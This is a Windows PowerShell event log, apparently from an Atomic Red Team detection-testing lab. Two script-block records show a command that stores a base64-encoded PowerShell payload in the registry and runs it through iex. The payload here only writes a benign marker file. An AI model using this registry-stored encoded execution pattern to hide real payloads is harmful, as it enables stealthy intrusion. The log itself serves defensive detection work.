Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476903
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476902
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476901
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476900
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476899
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476898
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476897
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476896
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476895
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476894
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476893
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476892
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476891
Keywords=None
Message=Completed invocation of ScriptBlock ID: b459aaab-de7d-420a-80f5-5c41c18dff6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476890
Keywords=None
Message=Started invocation of ScriptBlock ID: b459aaab-de7d-420a-80f5-5c41c18dff6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476889
Keywords=None
Message=Started invocation of ScriptBlock ID: 9977b850-34e8-42e4-a697-d3c6bfbce619
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476888
Keywords=None
Message=Completed invocation of ScriptBlock ID: 09cb335e-396f-45bc-bf57-1b3b9cd655fd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476887
Keywords=None
Message=Started invocation of ScriptBlock ID: 09cb335e-396f-45bc-bf57-1b3b9cd655fd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476886
Keywords=None
Message=Started invocation of ScriptBlock ID: e4e4e254-fb69-40ee-b4cf-c0286ae8b839
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476885
Keywords=None
Message=Creating Scriptblock text (1 of 1):
Invoke-AtomicTest T1059.001 -ShowDetailsBrief

ScriptBlock ID: e4e4e254-fb69-40ee-b4cf-c0286ae8b839
Path:
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476884
Keywords=None
Message=Completed invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477611
Keywords=None
Message=Started invocation of ScriptBlock ID: ddf0721b-9309-4e53-bf91-f4b22c9856e0
Runspace ID: 9c2bf95d-aa5c-439e-b1a2-ccb0994588f6
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1477610
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))}

ScriptBlock ID: ddf0721b-9309-4e53-bf91-f4b22c9856e0
Path:
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477609
Keywords=None
Message=Started invocation of ScriptBlock ID: f3d5f304-5803-4515-a701-a05bc6b9a677
Runspace ID: 9c2bf95d-aa5c-439e-b1a2-ccb0994588f6
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1477608
Keywords=None
Message=Creating Scriptblock text (1 of 1):
& {# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))}

ScriptBlock ID: f3d5f304-5803-4515-a701-a05bc6b9a677
Path:
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1477607
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1477606
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 5868 in AppDomain: DefaultAppDomain.
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1477605
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477604
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477603
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477602
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477601
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477600
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477599
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477598
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477597
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477596
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477595
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477594
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477593
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477592
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477591
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477590
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477589
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477588
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477587
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477586
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477585
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477584
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477583
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477582
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477581
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477580
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477579
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477578
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
